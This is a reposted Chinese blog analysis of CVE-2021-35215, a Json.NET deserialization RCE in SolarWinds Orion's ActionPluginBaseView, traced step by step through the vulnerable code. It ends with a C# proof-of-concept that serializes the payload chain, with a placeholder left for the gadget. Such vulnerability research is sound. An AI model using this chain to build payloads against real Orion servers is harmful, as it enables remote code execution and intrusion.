6

CVE-2021-35215 SolarWinds ActionPluginBaseView RCE

 2 years ago
source link: https://y4er.com/post/cve-2021-35215-solarwinds-orion-platform-actionpluginbaseview-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

CVE-2021-35215 SolarWinds ActionPluginBaseView RCE

2021-10-23 代码审计 CVE SolarWinds

原文分析:https://testbnull.medium.com/50-shades-of-solarwinds-orion-deserialization-part-1-cve-2021-35215-2e5764e0e4f2

原文讲的很清楚了,我这里大概记一下。看懂可能需要一些dotnet反序列化的基础知识,移步 https://github.com/Y4er/dotnet-deserialization

C:\InetPub\SolarWinds\Orion\RenderControl.aspx.cs OnInit()中加载控件,其中ctrl变量从请求中获取,可控。

1.png

controlToRender = LoadControl(ctrl);之后将controlToRender传递给ApplyPropertiesAndAttributes()

2.png

方法签名要求controlToRender是一个System.Web.UI.Control类型的控件。

然后346-352行是从JsonData中获取赋值给控件实例字段的名称和值,通过PropertySetter.SetProperties()进行反射赋值。JsonData是init的时候通过JavaScriptSerializer从http请求中反序列化回来的Dictionary<string, object>键值对,可控。

那么现在我们可以调用控件类的setter,所以找控件类。

然后找到了SolarWinds.Orion.Web.Actions.ActionPluginBaseView这个类

3.png

它这个setter调用了ParseViewContext(),跟进发现用了json.net的TypeNameHandling.Objects

4.png

并且JsonConvert.DeserializeObject<AlertingActionContext>(this.ViewContextJsonString, settings);中,AlertingActionContext这个类继承ActionContextBase类。

5.png

该类有个MacroContext类型的字段,而MacroContext类型里有个字段是ContextBase类型的List。

6.png

ContextBase是一个抽象类。

7.png

根据其KnownType知道可以往List中放SwisEntityContext类型的对象,而SwisEntityContext类中有一个字段是PropertyBag类型

8.png

该字段可以存放Object类型的对象

9.png

所以我们的gadget可以放在这里,造成RCE。

Github:https://github.com/Y4er/CVE-2021-35215

using System;
using System.Collections.Generic;
using System.IO;
using Newtonsoft.Json;
using SolarWinds.InformationService.Contract2;
using SolarWinds.Orion.Core.Models.Actions.Contexts;
using SolarWinds.Orion.Core.Models.MacroParsing;

namespace ConsoleApp1
{
    class Program
    {
        static void Main(string[] args)
        {
            var alertingActionContext = new AlertingActionContext();
            var macroContext = new MacroContext();
            var swisEntityContext = new SwisEntityContext();
            var dictionary = new Dictionary<string, Object>();
            dictionary["1"] = new Object(); // replace here with SessionSecurityToken gadget
            var propertyBag = new PropertyBag(dictionary);
            swisEntityContext.EntityProperties = propertyBag;
            macroContext.Add(swisEntityContext);

            alertingActionContext.MacroContext = macroContext;
            JsonSerializerSettings settings = new JsonSerializerSettings
            {
                TypeNameHandling = TypeNameHandling.Objects
            };
            var serializeObject = JsonConvert.SerializeObject(alertingActionContext, settings);
            Console.WriteLine(serializeObject);
            var streamWriter =
                new StreamWriter(@"C:\Users\admin\Desktop\my\code\netcore\ConsoleApp1\ConsoleApp1\poc.json");
            // serializeObject = serializeObject.Replace("\"", "\\\"");
            streamWriter.Write(serializeObject);
            streamWriter.Close();
        }
    }
}

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK